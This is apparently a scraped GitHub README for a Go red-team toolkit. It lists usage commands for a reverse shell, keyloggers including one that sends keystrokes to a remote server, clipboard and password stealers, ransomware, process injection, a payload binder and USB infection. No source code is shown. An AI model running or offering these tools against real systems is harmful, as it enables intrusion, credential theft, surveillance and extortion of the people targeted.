8000 GitHub - Dyst0rti0n/red-team-tools
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

Dyst0rti0n/red-team-tools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Redteam Toolkit

WIP

A collection of red-teaming attacking tools and payloads for Windows and Linux. Some of the scripts will be rougher than others in terms of output etc but I will be actively working on these and improving.

Tools

1. Reverse Shell

A simple reverse shell that connects to a specified IP and port.

Usage

go run reverse_shell/main.go <IP> <PORT>

2. Keylogger

A simple keylogger for Linux.

Usage

go run keylogger/main.go

The keylogger currently supports only Linux.

3. Network Scanner

A simple network scanner that scans a given IP range and port range.

Usage

go run network_scanner/main.go <IP_RANGE> <START_PORT> <END_PORT>

Example:

go run network_scanner/main.go 192.168.1.1 20 80

4. File Downloader

A tool to download files from a specified URL.

Usage

go run file_downloader/main.go <URL> <DEST>

Example:

go run file_downloader/main.go http://example.com/file.txt /tmp/file.txt

5. Screenshot Capturer

A tool to capture screenshots.

Usage

go run screenshot_capturer/main.go

6. Clipboard Stealer

A tool to steal the contents of the clipboard.

Usage

go run clipboard_stealer/main.go

7. Password Stealer

A tool to steal saved passwords (WiFi passwords for Linux).

Usage

go run password_stealer/main.go

8. Persistence Mechanism

A tool to establish persistence on the target system.

Usage

go run persistence/main.go

9. Port Forwarder

A tool to forward traffic from one port to another.

Usage

go run port_forwarder/main.go <LOCAL_PORT> <REMOTE_HOST> <REMOTE_PORT>

Example:

go run port_forwarder/main.go 8080 example.com 80

10. System Info Gatherer

A tool to gather detailed system information.

Usage

go run system_info_gatherer/main.go

11. Ransomware (Educational Purpose Only)

A tool to encrypt files in a specified directory using AES.

Usage

go run ransomware/main.go <DIRECTORY> <PASSWORD>

Example:

go run ransomware/main.go /path/to/target_directory mypassword

12. Webcam Capture

A tool to capture images from the webcam.

Usage

go run webcam_capture/main.go

13. Memory Dumper

Dumps the memory of a specified process.

Usage

go run memory_dumper/main.go <PID>

14. Stealth File Eraser

Securely deletes files to avoid recovery.

Usage

go run file_eraser/main.go <FILE_PATH>

15. Process Injection

Injects a DLL into a running process.

Usage

go run process_injection/main.go <PID> <DLL_PATH>

16. File Binder

Binds a malicious payload to a legitimate executable.

Usage

go run file_binder/main.go <LEGITIMATE_EXE> <MALICIOUS_PAYLOAD> <OUTPUT_EXE>

17. Keylogger with Network Exfiltration

< 8000 a id="user-content-17-keylogger-with-network-exfiltration" class="anchor" aria-label="Permalink: 17. Keylogger with Network Exfiltration" href="#17-keylogger-with-network-exfiltration">

Sends logged keystrokes to a remote server.

Usage

go run keylogger_network/main.go <SERVER_IP> <SERVER_PORT>

18. Anti-Debugging

Detects if the tool is being debugged.

Usage

go run anti_debugging/main.go

19. Network Packet Sniffer

Captures network packets on the local machine.

Usage

go run packet_sniffer/main.go <INTERFACE>

20. USB Infection

Infects USB drives with a malicious payload.

Usage

go run usb_infection/main.go <PAYLOAD> <DRIVE_LETTER>

21. System Recon

Collects extensive system information.

Usage

go run system_recon/main.go

Final Step: Update Dependencies

Ensure all dependencies are up to date.

go get -u ./...

Contributing

All contributions are welcome to improving this collection.

LICENSE

This work is under MIT License - Only use on authorised devices.

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

0